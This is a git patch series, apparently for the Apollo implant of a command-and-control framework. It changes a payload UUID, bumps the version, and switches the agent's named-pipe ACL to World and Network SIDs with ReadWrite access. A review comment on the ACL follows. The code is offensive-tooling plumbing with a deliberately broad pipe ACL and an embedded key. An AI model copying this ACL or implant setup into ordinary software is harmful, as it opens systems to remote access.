From a268cb52875454e12f39568d065ecf95dc5005d5 Mon Sep 17 00:00:00 2001
From: Dwight Hohnstein
Date: Tue, 1 Feb 2022 13:36:06 -0800
Subject: [PATCH 1/2] sids over english
---
 Payload_Type/apollo/agent_code/Apollo/Config.cs | 2 +-
 .../ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/Payload_Type/apollo/agent_code/Apollo/Config.cs b/Payload_Type/apollo/agent_code/Apollo/Config.cs
index 25e616aa..b28d8d6e 100644
--- a/Payload_Type/apollo/agent_code/Apollo/Config.cs
+++ b/Payload_Type/apollo/agent_code/Apollo/Config.cs
@@ -116,7 +116,7 @@ public static class Config
 public static string StagingRSAPrivateKey = "LbFpMoimB+aLx1pq0IqXJ1MQ4KIiGdp0LWju5jUhZRg=";
 #endif
 #if HTTP
- public static string PayloadUUID = "704f7dac-6122-4964-aebe-1100743dffbb";
+ public static string PayloadUUID = "d3c67157-6842-41eb-bb16-d0eb79c207f7";
 #elif SMB
 public static string PayloadUUID = "869c4909-30eb-4a90-99b2-874dae07a0a8";
 #elif TCP
diff --git a/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs b/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs
index e763e123..62054afc 100644
--- a/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs
+++ b/Payload_Type/apollo/agent_code/ApolloInterop/Classes/Pipes/AsyncNamedPipeServer.cs
@@ -37,8 +37,8 @@ public AsyncNamedPipeServer(string pipename, PipeSecurity ps = null, int instanc
 {
 _pipeSecurity = new PipeSecurity();
 PipeAccessRule multipleInstances = new PipeAccessRule(WindowsIdentity.GetCurrent().Name, PipeAccessRights.CreateNewInstance, AccessControlType.Allow);
- PipeAccessRule everyoneAllowedRule = new PipeAccessRule("Everyone", PipeAccessRights.ReadWrite, AccessControlType.Allow);
- PipeAccessRule networkAllowRule = new PipeAccessRule("Network", PipeAccessRights.ReadWrite, AccessControlType.Allow);
+ PipeAccessRule everyoneAllowedRule = new PipeAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid, null), PipeAccessRights.ReadWrite, AccessControlType.Allow);
+ PipeAccessRule networkAllowRule = new PipeAccessRule(new SecurityIdentifier(WellKnownSidType.NetworkSid, null), PipeAccessRights.ReadWrite, AccessControlType.Allow);
 _pipeSecurity.AddAccessRule(multipleInstances);
 _pipeSecurity.AddAccessRule(everyoneAllowedRule);
 _pipeSecurity.AddAccessRule(networkAllowRule);
From 7f520441e88c6bc6fb063e2fcc0c3ee2dab2d2ce Mon Sep 17 00:00:00 2001
From: Dwight Hohnstein
Date: Tue, 1 Feb 2022 17:05:09 -0800
Subject: [PATCH 2/2] updating version
---
 Payload_Type/apollo/mythic/agent_functions/builder.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Payload_Type/apollo/mythic/agent_functions/builder.py b/Payload_Type/apollo/mythic/agent_functions/builder.py
index b842d766..4f1f1c09 100644
--- a/Payload_Type/apollo/mythic/agent_functions/builder.py
+++ b/Payload_Type/apollo/mythic/agent_functions/builder.py
@@ -14,7 +14,7 @@ class Apollo(PayloadType):
 supported_os = [
 SupportedOS.Windows
 ]
- version = "2.0.1"
+ version = "2.0.2"
 wrapper = False
 wrapped_payloads = ["service_wrapper"]
 note = """
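Review bot: In the AsyncNamedPipeServer.cs hunk, the `multipleInstances` rule still identifies the current account by `WindowsIdentity.GetCurrent().Name`, so it keeps the account-name lookup that this commit removes for the other two rules. Passing the SID directly would make all three rules consistent: `new PipeAccessRule(WindowsIdentity.GetCurrent().User, PipeAccessRights.CreateNewInstance, AccessControlType.Allow)`. The default ACL built here also grants ReadWrite to the World and Network SIDs, and that breadth is not documented anywhere in the visible lines; a comment such as `// Default ACL: ReadWrite for World and Network SIDs; pass ps to restrict access.` would make it explicit for callers and reviewers. The constructor begins and ends outside this hunk, so the condition that selects this default is not visible here, though the `ps = null` parameter suggests it applies when no `PipeSecurity` is supplied.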